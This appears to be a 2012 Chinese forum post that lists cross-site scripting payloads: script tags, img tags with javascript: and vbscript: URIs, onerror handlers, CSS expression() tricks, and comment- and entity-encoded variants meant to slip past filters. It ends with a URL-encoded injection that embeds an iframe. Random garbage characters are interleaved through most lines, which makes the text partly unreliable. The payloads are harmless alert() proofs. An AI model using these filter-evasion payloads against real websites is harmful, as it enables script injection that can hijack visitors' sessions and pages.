<script>alert("跨站")</script> (最常用)& h$ R* d" u4 [6 C% ^4 G) V! [
<img scr=javascript:alert("跨站")></img>
' B; ]9 Y- r" H4 f<img scr="javascript: alert(/跨站/)></img>
( D6 q+ [6 M* N& J<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
/ B+ R# ]! U. q$ d& K) z& t: d<img scr="#" onerror=alert(/跨站/)></img>" z; x1 |; V3 P/ `( p
<img scr="#" style="xss:expression(alert(/xss/));"></img>' w6 t% d g5 H% b/ T
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
9 v% _: X* Y: `$ y: ^. g$ ~<img src=vbscript:msgbox ("xss")></img>
9 Q6 @* p4 |9 e& z; M, P/ F( U<style> input {left:expression (alert('xss'))}</style>: k1 {4 I5 k+ M1 L6 a
<div style={left:expression (alert('xss'))}></div>
& M0 B3 J S5 u* O<div style={left:exp/* */ression (alert('xss'))}></div>! W) a6 m& \7 i5 ^
<div style={left:\0065\0078ression (alert('xss'))}></div>3 |: L: J# T! ]
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
! A0 U$ |2 t+ f" j, S* v9 Municode <div style="{left:expRessioN (alert('xss'))}">0 P( k- e7 j) F
! C: [! _$ t; U- y1 S
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
0 Z8 a2 L" z1 c% o( `/ l, H |
发表于 2012-9-15 14:09:13
收藏
支持
反对